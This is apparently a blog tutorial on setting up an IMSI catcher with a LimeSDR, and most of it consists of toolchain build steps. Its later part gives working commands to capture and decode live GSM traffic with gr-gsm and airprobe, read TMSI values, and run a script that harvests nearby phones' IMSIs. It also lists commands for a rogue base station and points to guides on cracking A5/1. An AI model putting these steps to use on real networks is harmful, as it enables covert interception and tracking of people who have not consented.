LimeSDR Ubuntu Desktop 14.04 x86_64 Setup and IMSI Catcher

This post will guide you how to setup a simple IMSI catcher using LimeSDR in VMware.

I am using Ubuntu Desktop 14.04 amd64 in this setup.
The full command guideline is on Github.
Connect LimeSDR using USB3.0.

Download and install Ubuntu in VMware.

Manually download and install cmake because LimeSuite minimum requirement cmake version 3.1.3.

Decompress cmake file:

• tar -zxvf cmake-3.8.2-Linux-x86_64.tar.gz

We will run everything in root privilege. Move cmake to /opt folder and create a symlink for it:

• sudo su -
• mv cmake-3.8.2-Linux-x86_64/ cmake
• mv cmake /opt/cmake
• ln -s /opt/cmake/bin/* /usr/local/bin

Add LimeSDR driver repository:

• sudo add-apt-repository -y ppa:myriadrf/drivers
• sudo apt-get update

Install git, python-pip and python-dev packages:

• sudo apt-get install git python-pip python-dev

Install PyBombs then use pybombs to install UHD and others:

• pip install git+https://github.com/gnuradio/pybombs.git
• pybombs recipes add gr-recipes git+https://github.com/gnuradio/gr-recipes.git
• pybombs recipes add gr-etcetera git+https://github.com/gnuradio/gr-etcetera.git
• pybombs prefix init /usr/local -a myprefix -R gnuradio-default

Install packages for LimeSuite:

• sudo apt-get install g++ libsqlite3-dev libsoapysdr-dev libi2c-dev libusb-1.0-0-dev libwxgtk3.0-dev freeglut3-dev

Git clone LimeSuite:

• git clone https://github.com/myriadrf/LimeSuite.git
• cd LimeSuite
• mkdir builddir && cd builddir
• cmake ../
• make -j4
• make install

Running ldconfig to creates the necessary links and cache to the most recent shared libraries:

• ldconfig

Install gqrx, gr-osmosdr and uhd using PyBombs:

• pybombs install gqrx gr-osmosdr uhd

Running ldconfig to creates the necessary links and cache to the most recent shared libraries:

• ldconfig

Git clone EttusResearch UHD:

• git clone https://github.com/EttusResearch/uhd.git
• cd uhd/host/lib/usrp

Git clone OpenUSRP to simulate USRP B210 Device using LimeSDR:

• git clone https://github.com/jocover/OpenUSRP.git
• echo "INCLUDE_SUBDIRECTORY(OpenUSRP)">>CMakeLists.txt
• cd OpenUSRP

** Note **

If the version of your OpenUSRP doesn't has the following codes, you can skip the next step but if you have compile, build and install still not able to find the UHD, please use the following these UHD that I used during the setup. You may require to remove the build folder locate at uhd/host/build.

Edit limesdr_io_impl.cpp file:

• Comment line 691 to 696
• Comment line 698 to 699

Build and install UHD:

• cd ../../../
• mkdir build && cd build
• cmake ..
• make -j10
• make install
• ldconfig
• echo 'export UHD_MODULE_PATH=/usr/lib/uhd/modules' >> ~/.bashrc
• source ~/.bashrc

Checking the LimeSDR driver using uhd_usrp_probe:

• uhd_usrp_probe

Install gr-gsm using PyBombs:

• pybombs install gr-gsm
• ldconfig

Git clone airprobe, kalibrate and airprobe patch:

• git clone https://github.com/ksnieck/airprobe.git
• git clone https://github.com/steve-m/kalibrate-rtl
• git clone https://github.com/scateu/airprobe-3.7-hackrf-patch.git

Install packages:

• apt-get install git-core autoconf automake libtool g++ python-dev swig libpcap0.8-dev uhd-host libboost-all-dev libusb-1.0-0 libusb-1.0-0-dev libfftw3-dev swig python-numpy

Patching airprobe for gnuradio 3.7 compatibility:

• cd airprobe-3.7-hackrf-patch/
• cp * ../airprobe
• cd ../airprobe
• patch -p1 < zmiana.patch

Install gsm-receiver:

• cd gsm-receiver/
• ./bootstrap
• ./configure
• make
• make install

Install wireshark:

• apt-get install wireshark

Running grgsm_scanner:

• grgsm_scanner -v

Capture GSM traffic:

• grgsm_livemon -f 935.8M -s 1e6

Open second tab and start Wireshark loopback capture:

• wireshark

Stop grgsm_livemon and try airprobe_rtlsdr_capture then output to cfile:

• airpobe_rtlsdr_capture.py -f 950200000 -s 1000000 -g 40 -c capture.cfile -T 60

Restart the Wireshark then run grgsm_decode to analyze the cfile:

• grgsm_decode -f 950200000 -s 1e6 -c capture.cfile -m BCCH -t 0

 Notice the Immediate Assignment packet contains Channel Description, SDCCH8 and Timeslot 1.

Restart the Wireshark then run grgsm_decode to analyze the cfile again:

• grgsm_decode -f 950200000 -s 1e6 -c capture.cfile -m SDCCH8 -t 1

Notice the TMSI and encryption using A5/1. To crack the GSM traffic you required Kc from Sim Card. Due to limited storage, cracking Kc will not show in here.  Crazy Danish Hacker has a good tutorial on how to crack the GSM traffic. 

Install IMSI Catcher:

• git clone https://github.com/Oros42/IMSI-catcher.git
• apt-get install python-numpy python-scipy python-scapy

Running IMSI catcher on the first tab:

• python simple_IMSI-catcher.py

Running airprobe_rtlsdr on the second tab:

• airprobe_rtlsdr.py -f 935.2M -g 40 -s 1e6

If your IMSI catcher doesn't have output, remember to tune the airprobe frequency.

To setup a rouge BTS:

• osmo-nitb -c /root/osmo-combo/etc/osmocom/openbsc.cfg -l hlr.sqlite3 -P -C
• osmobts-trx -t 2 -c /root/osmo-trx/example/osmo-bts.cfg
• osmo-trx -c 1 -s 4 -e -l INFO

** Require to configure the openbsc,cfg and osmo-bts.cfg for MCC, MNC, LAC and CID. Haven't tested before.


Reference link during the setup IMSI Catcher:

1. https://cn0xroot.com/2017/04/12/limesdr-getting-started-quickly/
2. https://www.crazydanishhacker.com/gsm-cracking-sms-kraken-software-defined-radio-series-16/
3. https://www.ckn.io/blog/2015/11/29/gsm-sniffing-sms-traffic/

Reference link for configuring rouge BTS:

1. https://www.youtube.com/watch?v=LV-CRJWC5_o
2. https://fairwaves.co/docs/how_to%27s.html
3. https://fairwaves.co/products/docs/soft_conf.html

Special thanks to the owner of the LimeSDR device =)